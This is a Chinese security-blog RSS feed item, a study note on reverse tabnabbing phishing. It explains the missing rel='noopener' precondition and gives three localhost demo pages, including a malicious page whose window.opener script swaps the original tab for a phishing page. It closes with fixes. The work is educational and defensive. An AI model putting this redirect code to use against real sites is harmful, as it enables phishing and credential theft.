<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>钓鱼 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E9%92%93%E9%B1%BC/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Sun, 19 Jan 2020 11:38:18 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>钓鱼攻击之Reverse Tabnabbing学习</title>
		<link>/web/1120.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Mon, 13 Jan 2020 10:10:31 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[钓鱼]]></category>
		<guid isPermaLink="false">/?p=1120</guid>

					<description><![CDATA[原文https://xz.aliyun.com/t/7080 在先知看到的Reverse Tabnabbing这篇文章感觉还是蛮有意思的，于是自己亲自测了一下。 漏洞利用条件 a标...]]></description>
										<content:encoded><![CDATA[<blockquote><p>
  原文https://xz.aliyun.com/t/7080
</p></blockquote>
<p>在先知看到的Reverse Tabnabbing这篇文章感觉还是蛮有意思的，于是自己亲自测了一下。</p>
<h3>漏洞利用条件</h3>
<ul>
<li>a标签拥有target属性，其值为_blank,同时没有使用rel=&#8221;noopener&#8221;</p>
</li>
<li>
<p>或window.open同样可以实现</p>
</li>
</ul>
<h3>漏洞原理</h3>
<ul>
<li>使用A页面的a标签进行设置为恶意网站B，于恶意网站B中产生window.opener的API去修改原先页面A的内容，修改为<span class="wpcom_tag_link"><a href="/tags/%e9%92%93%e9%b1%bc" title="钓鱼" target="_blank">钓鱼</a></span>页面C的内容达到钓鱼的目的。</li>
</ul>
<h3>漏洞实践</h3>
<p>新建三个页面</p>
<pre data-language=HTML><code class="language-markup ">A 页面为正常页面

&lt;html&gt;
&lt;title&gt;legit website&lt;/title&gt;
 &lt;body&gt;
  &lt;li&gt;&lt;a href="http://localhost/b.html" target="_blank" &gt;打开Y4的❤️&lt;/a&gt;&lt;/li&gt;
  &lt;button onclick="window.open('http://localhost/b.html')"&gt;打开Y4的❤️&lt;/button&gt;
 &lt;/body&gt;
&lt;/html&gt;
</code></pre>
<pre data-language=HTML><code class="language-markup ">B为恶意页面
主要为B页面的window.opener属性实现
&lt;html&gt;
&lt;title&gt;malicious website&lt;/title&gt;
 &lt;body&gt;
  &lt;script&gt;
   if (window.opener) {
      window.opener.location = "http://localhost/c.html";
   }else{alert("Y4不爱你");}
  &lt;/script&gt;
 &lt;/body&gt;
&lt;/html&gt;
</code></pre>
<pre data-language=HTML><code class="language-markup ">C页面为钓鱼网站

&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;phish website&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;li&gt;&lt;a href="http://localhost/b.html" target="_blank"&gt;打开撕夜的❤️&lt;/a&gt;&lt;/li&gt;
  &lt;button onclick="window.open('http://localhost/b.html')"&gt;打开撕夜的❤️&lt;/button&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>漏洞测试</p>
<p><strong>打开A页面打开进入y4的❤️</strong></p>
<p><img src="/wp-content/uploads/2020/01/3CEYBzUkH65oXq7-1.png" alt="image.png" /></p>
<p><strong>点击进入y4的❤️发现新 打开了B页面</strong><br />
<img src="/wp-content/uploads/2020/01/9bM2nrgJ8vpVAEI-1.png" alt="image.png" /></p>
<p><strong>再次查看愿页面，已经被替换了，为钓鱼界面</strong><br />
<img src="/wp-content/uploads/2020/01/tKoUxy3rsLBMNnS-1.png" alt="image.png" /></p>
<h3>修复方案</h3>
<ul>
<li>
<p>a标签中添加rel=&#8221;noopener&#8221;</p>
</li>
<li>
<p>手动设置opener API</p>
</li>
</ul>
<pre><code class="language-javascript ">var otherWindow = window.open();
otherWindow.opener = null;
otherWindow.location = url;
</code></pre>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
